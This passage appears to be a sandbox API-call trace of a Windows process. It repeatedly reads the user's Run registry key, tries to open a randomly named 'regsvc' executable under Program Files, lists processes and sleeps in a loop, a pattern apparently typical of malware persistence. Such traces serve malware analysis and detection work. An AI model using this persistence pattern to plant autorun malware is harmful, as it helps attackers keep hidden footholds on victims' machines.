ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0252.411] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0252.411] NtClose (Handle=0x14c) returned 0x0 [0252.411] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0252.411] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0252.412] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0252.412] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0252.412] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0252.412] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0252.412] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0252.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0252.493] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0252.494] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0252.506] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0252.506] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0252.507] NtClose (Handle=0x14c) returned 0x0 [0252.507] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0252.507] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0252.507] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0252.507] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0252.507] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0252.507] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0252.507] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0252.507] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0252.590] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0252.591] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0252.598] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0252.599] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0252.599] NtClose (Handle=0x14c) returned 0x0 [0252.599] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0252.599] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0252.599] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0252.599] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0252.599] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0252.599] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0252.599] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0252.599] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0252.683] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0252.683] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0252.696] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0252.696] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0252.696] NtClose (Handle=0x14c) returned 0x0 [0252.696] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0252.696] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0252.696] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0252.696] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0252.696] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0252.696] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0252.696] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0252.697] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0252.777] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0252.778] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0252.786] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0252.786] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0252.786] NtClose (Handle=0x14c) returned 0x0 [0252.786] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0252.786] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0252.786] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0252.786] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0252.786] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0252.786] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0252.786] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0252.787] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0252.876] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0252.877] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0252.885] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0252.885] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0252.885] NtClose (Handle=0x14c) returned 0x0 [0252.885] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0252.885] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0252.885] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0252.885] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0252.885] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0252.885] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0252.885] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0252.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0252.976] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0252.977] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0252.989] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0252.990] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0252.990] NtClose (Handle=0x14c) returned 0x0 [0252.990] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0252.990] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0252.990] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0252.990] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0252.990] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0252.990] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0252.990] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0252.990] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0253.079] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0253.080] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0253.108] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0253.109] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0253.109] NtClose (Handle=0x14c) returned 0x0 [0253.109] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0253.109] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0253.111] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0253.111] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0253.111] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, 